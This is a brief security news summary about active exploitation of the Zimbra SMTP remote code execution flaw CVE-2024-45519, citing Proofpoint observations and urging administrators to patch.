October 1, 2024 at 05:47PM
Cyber attackers are actively exploiting a severe remote code execution vulnerability (CVE-2024-45519) in Zimbra’s SMTP server, allowing them to take control of vulnerable systems. Proofpoint researchers observed attacks since Sept. 28, with attackers sending spoofed emails containing base64-encoded malicious code. Zimbra issued updates, but administrators need to apply them promptly to prevent unauthorized access.
Based on the meeting notes, the key takeaways are as follows:
– Zimbra has recently disclosed a severe remote code execution vulnerability (CVE-2024-45519) in its SMTP server, which allows unauthenticated remote attackers to execute arbitrary commands on vulnerable systems.
– Proofpoint researchers have observed ongoing attacks targeting this vulnerability since September 28th. The attackers are sending spoofed emails containing base64-encoded malicious code to vulnerable Zimbra servers, enabling them to execute unauthorized commands and potentially gain control of the servers.
– The threat actor behind these attacks is using the same server for sending exploit emails and hosting the second-stage payload, suggesting a relatively immature operation.
– The attacks appear to be more opportunistic in nature rather than targeted, with the volume of attacks remaining consistent since they began last week.
– Project Discovery released a proof-of-concept for the vulnerability on September 27th and emphasized the importance of promptly applying the latest patches to mitigate the risk of exploitation.
– Zimbra Collaboration Suite is widely used, making it a prime target for attackers, as evidenced by previous zero-day attacks and targeted exploitation incidents.
These takeaways highlight the urgent need for affected organizations to patch their vulnerable Zimbra instances and to stay vigilant against potential exploitation attempts.